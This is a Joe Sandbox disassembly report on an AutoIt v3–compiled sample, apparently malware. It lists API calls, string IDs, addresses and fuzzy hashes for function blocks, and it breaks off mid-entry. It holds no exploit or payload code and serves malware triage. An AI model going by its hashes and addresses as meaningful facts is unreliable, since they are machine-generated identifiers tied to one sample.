                                                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                        • API String ID: 2211948467-2373415609
                                                                                                                        • Opcode ID: 268abff640c59fbdcc5eb172ca34a1e8cc36320d2f3680ce922fd633ee79b5b4
                                                                                                                        • Instruction ID: 0ec41d1e7c0798b34f84176e6a952f098d2ec1404cf48f0f1f672d35d097a7ae
                                                                                                                        • Opcode Fuzzy Hash: 268abff640c59fbdcc5eb172ca34a1e8cc36320d2f3680ce922fd633ee79b5b4
                                                                                                                        • Instruction Fuzzy Hash: FD02A071900209AFDB25DFA4CD89EBEBBB9FF49310F048158F905AB2A4DB759D01DB60
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?,0100F910), ref: 010038AF
                                                                                                                        • IsWindowVisible.USER32(?), ref: 010038D3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpperVisibleWindow
                                                                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                        • API String ID: 4105515805-45149045
                                                                                                                        • Opcode ID: 6551f6220d5d74fdb8fd340a9ed5482ce77f45c772ecd5c6530f373bb0091f76
                                                                                                                        • Instruction ID: c8cf2964e6cf4f3e5b09332c7c394216191544922bc3195ae3f8079b0c9b7c54
                                                                                                                        • Opcode Fuzzy Hash: 6551f6220d5d74fdb8fd340a9ed5482ce77f45c772ecd5c6530f373bb0091f76
                                                                                                                        • Instruction Fuzzy Hash: F4D180702083069FDB16EF14C895AAE7BE5BF95344F044459B8C69F3E2CF29E90ADB41
                                                                                                                        APIs
                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 0100A89F
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0100A8D0
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 0100A8DC
                                                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 0100A8F6
                                                                                                                        • SelectObject.GDI32(?,?), ref: 0100A905
                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0100A930
                                                                                                                        • GetSysColor.USER32(00000010), ref: 0100A938
                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 0100A93F
                                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 0100A94E
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0100A955
                                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0100A9A0
                                                                                                                        • FillRect.USER32(?,?,?), ref: 0100A9D2
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0100A9FD
                                                                                                                          • Part of subcall function 0100AB60: GetSysColor.USER32(00000012), ref: 0100AB99
                                                                                                                          • Part of subcall function 0100AB60: SetTextColor.GDI32(?,?), ref: 0100AB9D
                                                                                                                          • Part of subcall function 0100AB60: GetSysColorBrush.USER32(0000000F), ref: 0100ABB3
                                                                                                                          • Part of subcall function 0100AB60: GetSysColor.USER32(0000000F), ref: 0100ABBE
                                                                                                                          • Part of subcall function 0100AB60: GetSysColor.USER32(00000011), ref: 0100ABDB
                                                                                                                          • Part of subcall function 0100AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0100ABE9
                                                                                                                          • Part of subcall function 0100AB60: SelectObject.GDI32(?,00000000), ref: 0100ABFA
                                                                                                                          • Part of subcall function 0100AB60: SetBkColor.GDI32(?,00000000), ref: 0100AC03
                                                                                                                          • Part of subcall function 0100AB60: SelectObject.GDI32(?,?), ref: 0100AC10
                                                                                                                          • Part of subcall function 0100AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0100AC2F
                                                                                                                          • Part of subcall function 0100AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0100AC46
                                                                                                                          • Part of subcall function 0100AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0100AC5B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4124339563-0
                                                                                                                        • Opcode ID: 6b7a1ba3ccc2159eb7490807674eb3de6b361bdb46a598f7bc7c8fa9904e3446
                                                                                                                        • Instruction ID: 0bad95d40ad5e8b8062bbda951e04d443373f2794240d0b5d3998952adf34107
                                                                                                                        • Opcode Fuzzy Hash: 6b7a1ba3ccc2159eb7490807674eb3de6b361bdb46a598f7bc7c8fa9904e3446
                                                                                                                        • Instruction Fuzzy Hash: 20A1A072108302EFE7629F64DC08A5B7BE9FF89321F004A19FAA2971D0D73AD944DB51
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(?,?,?), ref: 00F82CA2
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00F82CE8
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00F82CF3
                                                                                                                        • DestroyIcon.USER32(00000000,?,?,?), ref: 00F82CFE
                                                                                                                        • DestroyWindow.USER32(00000000,?,?,?), ref: 00F82D09
                                                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00FBC68B
                                                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00FBC6C4
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00FBCAED
                                                                                                                          • Part of subcall function 00F81B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F82036,?,00000000,?,?,?,?,00F816CB,00000000,?), ref: 00F81B9A
                                                                                                                        • SendMessageW.USER32(?,00001053), ref: 00FBCB2A
                                                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00FBCB41
                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FBCB57
                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FBCB62
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 464785882-4108050209
                                                                                                                        • Opcode ID: 399fc97ba45cfba055e65edaa5ffa2bc25a89639dfc0efd958809dc013281883
                                                                                                                        • Instruction ID: 3c687586b0f12ef1c80416537ff35c15057f398edcc403831470f34be59f621c
                                                                                                                        • Opcode Fuzzy Hash: 399fc97ba45cfba055e65edaa5ffa2bc25a89639dfc0efd958809dc013281883
                                                                                                                        • Instruction Fuzzy Hash: CF12AF30A04202EFDB21DF25C885BEABBE5BF45320F544569F586DB252CB35E842EF90
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(00000000), ref: 00FF77F1
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00FF78B0
                                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00FF78EE
                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00FF7900
                                                                                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00FF7946
                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00FF7952
                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00FF7996
                                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00FF79A5
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00FF79B5
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00FF79B9
                                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00FF79C9
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FF79D2
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00FF79DB
                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00FF7A07
                                                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00FF7A1E
                                                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00FF7A59
                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00FF7A6D
                                                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00FF7A7E
                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00FF7AAE
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00FF7AB9
                                                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00FF7AC4
                                                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00FF7ACE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                        • API String ID: 2910397461-517079104
                                                                                                                        • Opcode ID: cf6fa61d86094bad036563a35e2658ac7b3c949a98c2d5b685bacc75e124f578
                                                                                                                        • Instruction ID: 3c352b341659126c3e703e2d2f41c65a53875e9f92185cee9776eece1418c63b
                                                                                                                        • Opcode Fuzzy Hash: cf6fa61d86094bad036563a35e2658ac7b3c949a98c2d5b685bacc75e124f578
                                                                                                                        • Instruction Fuzzy Hash: 25A192B1A40609BFEB24DBA4DD8AFAEBBB9EF45710F104104FA54A71D0D779AD00DB60
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00FEAF89
                                                                                                                        • GetDriveTypeW.KERNEL32(?,0100FAC0,?,\\.\,0100F910), ref: 00FEB066
                                                                                                                        • SetErrorMode.KERNEL32(00000000,0100FAC0,?,\\.\,0100F910), ref: 00FEB1C4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$DriveType
                                                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                        • API String ID: 2907320926-4222207086
                                                                                                                        • Opcode ID: c39ddcd52c84a7ef5695745ea8e9b2f437f2b73a31e258d1acffc3b73c10504e
                                                                                                                        • Instruction ID: 590189b23793f4f74090a3ac8950f129407eade0b45da4fe463b3d32b62282bc
                                                                                                                        • Opcode Fuzzy Hash: c39ddcd52c84a7ef5695745ea8e9b2f437f2b73a31e258d1acffc3b73c10504e
                                                                                                                        • Instruction Fuzzy Hash: DB519431B84386EB8B15EB13CD92ABE73B4BB947657204019E487EB260C77DAD41FB41
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsnicmp
                                                                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                        • API String ID: 1038674560-86951937
                                                                                                                        • Opcode ID: 5c2929ae54897e8de2e313f6c69c6df66f834f465c2160430e173d96db2589d3
                                                                                                                        • Instruction ID: 7492dc1f82b73c6a36fc969dbca439259fbe38f500466de4fbe9ee7daa474c92
                                                                                                                        • Opcode Fuzzy Hash: 5c2929ae54897e8de2e313f6c69c6df66f834f465c2160430e173d96db2589d3
                                                                                                                        • Instruction Fuzzy Hash: BF8127B1A00316BBCB25BB61CC83FEE7768AF16710F144024F941EA186EB68DA45F791
                                                                                                                        APIs
                                                                                                                        • GetSysColor.USER32(00000012), ref: 0100AB99
                                                                                                                        • SetTextColor.GDI32(?,?), ref: 0100AB9D
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0100ABB3
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 0100ABBE
                                                                                                                        • CreateSolidBrush.GDI32(?), ref: 0100ABC3
                                                                                                                        • GetSysColor.USER32(00000011), ref: 0100ABDB
                                                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0100ABE9
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0100ABFA
                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 0100AC03
                                                                                                                        • SelectObject.GDI32(?,?), ref: 0100AC10
                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0100AC2F
                                                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0100AC46
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0100AC5B
                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0100ACA7
                                                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0100ACCE
                                                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0100ACEC
                                                                                                                        • DrawFocusRect.USER32(?,?), ref: 0100ACF7
                                                                                                                        • GetSysColor.USER32(00000011), ref: 0100AD05
                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 0100AD0D
                                                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0100AD21
                                                                                                                        • SelectObject.GDI32(?,0100A869), ref: 0100AD38
                                                                                                                        • DeleteObject.GDI32(?), ref: 0100AD43
                                                                                                                        • SelectObject.GDI32(?,?), ref: 0100AD49
                                                                                                                        • DeleteObject.GDI32(?), ref: 0100AD4E
                                                                                                                        • SetTextColor.GDI32(?,?), ref: 0100AD54
                                                                                                                        • SetBkColor.GDI32(?,?), ref: 0100AD5E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1996641542-0
                                                                                                                        • Opcode ID: cec417edc257d2cd7b70ce1c065a625d80100edebeb48e772b6a2500119f188b
                                                                                                                        • Instruction ID: c57425853eb83f34d5923260b2085922758ebcc018dec225c80f914018bd43a8
                                                                                                                        • Opcode Fuzzy Hash: cec417edc257d2cd7b70ce1c065a625d80100edebeb48e772b6a2500119f188b
                                                                                                                        • Instruction Fuzzy Hash: 26617F71900219EFEB229FA8DC48EAE7BB9FB08320F114515FA51AB2D1D6769940DB90
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 01008D34
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01008D45
                                                                                                                        • CharNextW.USER32(0000014E), ref: 01008D74
                                                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01008DB5
                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01008DCB
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01008DDC
                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 01008DF9
                                                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 01008E45
                                                                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 01008E5B
                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 01008E8C
                                                                                                                        • _memset.LIBCMT ref: 01008EB1
                                                                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 01008EFA
                                                                                                                        • _memset.LIBCMT ref: 01008F59
                                                                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 01008F83
                                                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 01008FDB
                                                                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 01009088
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 010090AA
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 010090F4
                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01009121
                                                                                                                        • DrawMenuBar.USER32(?), ref: 01009130
                                                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 01009158
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 1073566785-4108050209
                                                                                                                        • Opcode ID: 30b8d263df5c3fb1182404a7a269f645ed5c98020966112fb7ea34dd1e4c953f
                                                                                                                        • Instruction ID: 40b7f14fbf3e1642440097ed63bbdd741a793d1a0c82f1b47cda59095c11ee1b
                                                                                                                        • Opcode Fuzzy Hash: 30b8d263df5c3fb1182404a7a269f645ed5c98020966112fb7ea34dd1e4c953f
                                                                                                                        • Instruction Fuzzy Hash: 41E18470904209ABEF22DF64CC84EEE7BB9FF05714F00819AFA99961D1DB758A41DF50
                                                                                                                        APIs
                                                                                                                        • GetCursorPos.USER32(?), ref: 01004C51
                                                                                                                        • GetDesktopWindow.USER32 ref: 01004C66
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 01004C6D
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 01004CCF
                                                                                                                        • DestroyWindow.USER32(?), ref: 01004CFB
                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 01004D24
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01004D42
                                                                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 01004D68
                                                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 01004D7D
                                                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01004D90
                                                                                                                        • IsWindowVisible.USER32(?), ref: 01004DB0
                                                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01004DCB
                                                                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01004DDF
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 01004DF7
                                                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 01004E1D
                                                                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 01004E37
                                                                                                                        • CopyRect.USER32(?,?), ref: 01004E4E
                                                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 01004EB9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                        • String ID: ($0$tooltips_class32
                                                                                                                        • API String ID: 698492251-4156429822
                                                                                                                        • Opcode ID: 1a9bdd0ce436dfc8f702aa21b08ef5d9fdd7dbccd1f04ed9faae6f21bc861b93
                                                                                                                        • Instruction ID: f2d29199f18b5a4223f9926daa616bc0a61b0b8e09f23786bf12aef36955ffdc
                                                                                                                        • Opcode Fuzzy Hash: 1a9bdd0ce436dfc8f702aa21b08ef5d9fdd7dbccd1f04ed9faae6f21bc861b93
                                                                                                                        • Instruction Fuzzy Hash: 8FB18C71608341AFEB55DF28C848B6ABBE4BF88310F04891DF6C9DB291DB75E805CB56
                                                                                                                        APIs
                                                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00FE46E8
                                                                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00FE470E
                                                                                                                        • _wcscpy.LIBCMT ref: 00FE473C
                                                                                                                        • _wcscmp.LIBCMT ref: 00FE4747
                                                                                                                        • _wcscat.LIBCMT ref: 00FE475D
                                                                                                                        • _wcsstr.LIBCMT ref: 00FE4768
                                                                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00FE4784
                                                                                                                        • _wcscat.LIBCMT ref: 00FE47CD
                                                                                                                        • _wcscat.LIBCMT ref: 00FE47D4
                                                                                                                        • _wcsncpy.LIBCMT ref: 00FE47FF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
